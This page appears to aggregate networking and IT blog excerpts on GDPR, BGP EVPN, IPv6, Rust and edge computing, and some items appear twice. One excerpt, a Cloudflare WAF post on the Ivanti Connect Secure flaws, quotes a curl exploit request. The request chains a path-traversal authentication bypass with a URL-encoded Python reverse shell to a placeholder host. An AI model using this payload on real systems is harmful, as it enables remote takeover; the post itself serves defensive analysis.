Reflecting on the GDPR to celebrate Privacy Day 2024
Just in time for Data Privacy Day 2024 on January 28, the EU Commission is calling for evidence to understand how the EU’s General Data Protection Regulation (GDPR) has been functioning now that we’re nearing the 6th anniversary of the regulation coming into force.
We’re so glad they asked, because we have some thoughts. And what better way to celebrate privacy day than by discussing whether the application of the GDPR has actually done anything to improve people’s privacy?
The answer is, mostly yes, but in a couple of significant ways – no.
Overall, the GDPR is rightly seen as the global gold standard for privacy protection. It has served as a model for what data protection practices should look like globally, it enshrines data subject rights that have been copied across jurisdictions, and when it took effect, it created a standard for the kinds of privacy protections people worldwide should be able to expect and demand from the entities that handle their personal data. On balance, the GDPR has definitely moved the needle in the right direction for giving people more control over their personal data and in protecting their privacy.
In a couple of key areas, however, we Continue reading
Which Cybersecurity Practices Matter Most? The Cyber Insurance Industry Offers Data-Driven Insight
IT leaders should heed the guidance of cybersecurity insurance providers who think businesses should prioritize security education, incident preparedness, regular internal audits, and ongoing vulnerability scanning and patching.A Handy Acronym for Troubleshooting
While I may be getting further from my days of being an active IT troubleshooter it doesn’t mean that I can’t keep refining my technique. As I spend time looking back on my formative years of doing troubleshooting either from a desktop perspective or from a larger enterprise role I find that there were always a few things that were critical to understand about the issues I was facing.
Sadly, getting that information out of people in the middle of a crisis wasn’t always super easy. I often ran into people that were very hard to communicate with during an outage or a big problem. Sometimes they were complicit because they made the mistake that caused it. They also bristled at the idea of someone else coming to fix something they couldn’t or wouldn’t. Just as often I ran into people that loved to give me lots of information that wasn’t relevant to the issue. Whether they were nervous talkers or just had a bad grasp on the situation it resulted in me having to sift through all that data to tease out the information I needed.
The Method
Today, as I look back on my career I would like Continue reading
IPB143: Are We Stuck With Dual-Stack Forever?
These days, most network devices can speak both IPv4 and IPv6. A dual-stack approach can smooth the transition from one protocol to the other because organizations can get comfortable with IPv6 without having to make a hard cutover. However, they may get so comfortable that they never fully commit. In this episode Ed, Scott, and... Read more »BGP EVPN Part IV: MAC-VRF L2RIB Update: Local MAC Address
In Figure 1-3 we have VLAN 10 mapped to EVI/MAC-VRF L2VNI10000. TS-A1 (IP: 192.168.11.12/MAC: 1000.0010.beef) is connected to VLAN10 via Attachment Circuit (AC) Ethernet 1/2, (ifindex: 1a000200).
Figure 1-3: MAC-VRF: L2RIB Local Learning Process.
Example 1-1 shows the VLAN to L2VNI mapping information.
Leaf-101# show vlan id 10 vn-segment
VLAN Segment-id
---- -----------
10 10000
VLAN Segment-id
---- -----------
10 10000
Example 1-1: VLAN to EVPN Instance Mapping Information.
Step-1 and 2: MAC Table Update
During the startup process, TS-A1 sends a Gratuitous ARP (GARP) message to announce its presence on the network and validate the uniqueness of its IP address. It uses its IP address in the Target IP field (Example 1-2). If another host responds to this unsolicited ARP reply, it indicates a potential IP address conflict.
Ethernet II, Src: 10:00:00:10:be:ef, Dst: Broadcast (ff:ff:ff:ff:ff:ff)
Address Resolution Protocol (reply/gratuitous ARP)
Hardware type: Ethernet (1)
Protocol type: IPv4 (0x0800)
Hardware size: 6
Protocol size: 4
Opcode: reply (2)
[Is gratuitous: True]
Sender MAC address: 10:00:00:10:be:ef (10:00:00:10:be:ef)
Sender IP address: 192.168.11.12
Target MAC address: Broadcast Continue reading
Address Resolution Protocol (reply/gratuitous ARP)
Hardware type: Ethernet (1)
Protocol type: IPv4 (0x0800)
Hardware size: 6
Protocol size: 4
Opcode: reply (2)
[Is gratuitous: True]
Sender MAC address: 10:00:00:10:be:ef (10:00:00:10:be:ef)
Sender IP address: 192.168.11.12
Target MAC address: Broadcast Continue reading
Availability Zones in VMware NSX-Based Cloud
One of the ipSpace.net subscribers sent me this question:
How could I use NSX to create a cloud-like software network layer enabling a VMware enterprise to create a public cloud-like availability zone concept within a data center (something like Oracle Cloud does)?
That’s easy: stop believing in VMware marketing shenanigans.
Availability Zones in VMware NSX-Based Cloud
One of the ipSpace.net subscribers sent me this question:
How could I use NSX to create a cloud-like software network layer enabling a VMware enterprise to create a public cloud-like availability zone concept within a data center (something like Oracle Cloud does)?
That’s easy: stop believing in VMware marketing shenanigans.
AI Enables New Cyber Threats. Are You Ready?
While AI's benefits assist businesses, it opens the door to additional cyber threats, challenges, and risks that organizations must acknowledge.D2C230: Adding Python To Your Operations Toolkit
Today we’re talking about Python. If you’re new to Python and want to add it to your toolkit, this is the show for you. This episode offers a broad perspective on all the approaches and plug-ins that Python includes. Our guest Michael Kennedy is a Python enthusiast and Python instructor. We discuss: Why you should... Read more »NetOps: The Key to Speeding Up Service Delivery for CSPs
Enhanced NetOps is the key to delivering, in a timely manner, the advanced communications services enterprises require to run their businesses.Navigating the Frontier: Overcoming Challenges in the Ever-Expanding Landscape of Edge Computing
Edge computing provides a competitive advantage for companies that make it a strategic priority. Getting the most out of edge technology means understanding and navigating the particular challenges of the edge, including harsh environments and a new set of security concerns.Introducing Foundations – our open source Rust service foundation library
In this blog post, we're excited to present Foundations, our foundational library for Rust services, now released as open source on GitHub. Foundations is a foundational Rust library, designed to help scale programs for distributed, production-grade systems. It enables engineers to concentrate on the core business logic of their services, rather than the intricacies of production operation setups.
Originally developed as part of our Oxy proxy framework, Foundations has evolved to serve a wider range of applications. For those interested in exploring its technical capabilities, we recommend consulting the library’s API documentation. Additionally, this post will cover the motivations behind Foundations' creation and provide a concise summary of its key features. Stay with us to learn more about how Foundations can support your Rust projects.
What is Foundations?
In software development, seemingly minor tasks can become complex when scaled up. This complexity is particularly evident when comparing the deployment of services on server hardware globally to running a program on a personal laptop.
The key question is: what fundamentally changes when transitioning from a simple laptop-based prototype to a full-fledged service in a production environment? Through our experience in developing numerous services, we've identified several critical differences:
- Observability: Continue reading
HW019: The Crucial Collaboration Between Wireless Engineers And Architects
Host Keith Parsons and guest Kelly Burroughs from iBwave discuss the crucial need for collaboration between Wi-Fi engineers and architects to ensure optimal wireless connectivity in building designs. They explore the use of BIM file formats for better integration and the importance of considering wireless as a utility in the architectural process. The conversation addresses... Read more »HS063: What’s On Our Minds
Hosts Greg Ferro and Johna Till Johnson reflect on the technological advancements of 2023 and discuss the trends for 2024. In this wide-ranging conversation, they chat about the rise of AI, tech consolidation, and the impact of automation on infrastructure. They also explore the geopolitical impact on supply chains, the move away from Chinese manufacturing,... Read more »
APIs: The Key to Generative AI Success and Security
API security is going to be a foundational security capability that every organization will need to employ if they're going to leverage AI in any capacity.MikroTik ROS 7.14beta8 released
MikroTik Routers and Wireless – Software
RouterOS continues to mature as we move through the versions in the teens.
When we transitioned between ROSv5 and ROSv6 in the early 2010s, it was right around this version numbering that we started to see production stability. By the time 6.2x versions came out, the general consensus was that v6 was ready for prime time. We are getting closer to that point in ROSv7 – depending on your use case.
Certainly, there are still issues to solve for advanced users like ISPs and Data Centers that need protocols like BGP, OSPF, IS-IS and MPLS, but simpler use cases seem to really be stabilizing with the last few months of releases.
Notable changes in this release:
*) bgp – allow to leak routes between local VRFs;
There are a few reasons this is a really important addition to ROSv7. First, it’s an issue that’s been on the roadmap for a very long time as noted in the Routing Protocol Overview section of MikroTik’s help docs. This is encouraging because it’s likely been one of the harder problems for the development team to solve given the length of time it sat open.
Secondly, it’s Continue reading
How Cloudflare’s AI WAF proactively detected the Ivanti Connect Secure critical zero-day vulnerability
Most WAF providers rely on reactive methods, responding to vulnerabilities after they have been discovered and exploited. However, we believe in proactively addressing potential risks, and using AI to achieve this. Today we are sharing a recent example of a critical vulnerability (CVE-2023-46805 and CVE-2024-21887) and how Cloudflare's Attack Score powered by AI, and Emergency Rules in the WAF have countered this threat.
The threat: CVE-2023-46805 and CVE-2024-21887
An authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887) impacting Ivanti products were recently disclosed and analyzed by AttackerKB. This vulnerability poses significant risks which could lead to unauthorized access and control over affected systems. In the following section we are going to discuss how this vulnerability can be exploited.
Technical analysis
As discussed in AttackerKB, the attacker can send a specially crafted request to the target system using a command like this:
curl -ik --path-as-is https://VICTIM/api/v1/totp/user-backup-code/../../license/keys-status/%3Bpython%20%2Dc%20%27import%20socket%2Csubprocess%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22CONNECTBACKIP%22%2CCONNECTBACKPORT%29%29%3Bsubprocess%2Ecall%28%5B%22%2Fbin%2Fsh%22%2C%22%2Di%22%5D%2Cstdin%3Ds%2Efileno%28%29%2Cstdout%3Ds%2Efileno%28%29%2Cstderr%3Ds%2Efileno%28%29%29%27%3B
This command targets an endpoint (/license/keys-status/) that is usually protected by authentication. However, the attacker can bypass the authentication by manipulating the URL to include /api/v1/totp/user-backup-code/../../license/keys-status/. This technique is known as directory traversal.
The URL-encoded part of the command decodes to a Python reverse Continue reading
Tackling the 5Cs of Enterprise Security with the Advent of AI – Spotlight on Cloud and Automation Efficiency
For the traditional enterprise, the last decade has been an ongoing saga in the journey to cloud. This either moving workloads into the public cloud or embracing a cloud-operating model within their private cloud and data center environments. Along the way multi-cloud and hybrid deployments have also become commonplace.
This trend gave birth to many companies that built solutions that were born in the cloud or were highly optimized for deployment there. Organizations big and small embraced the “cloud-first” and subsequently “mobile-first” mentality. While smaller organizations with no legacy infrastructure or applications were able to embrace cloud tenets from Day-1, for larger organizations, the journey has had many pit stops and perhaps several pit falls. A lot of this rolled under the digital transformation umbrella, as CIOs, CISOs and even CEOs became executive sponsors of such initiatives.
The shift from agility to efficiency
During the last 10-15 years, the move to cloud has largely been precipitated by the need for agility. The initial developer driven move to cloud, that had precipitated “shadow-IT”, has gradually paved way for dual-mode IT and now become mainstream as enterprise IT organizations proactively took ownership leading to a more pragmatic cloud operating model.
The Continue reading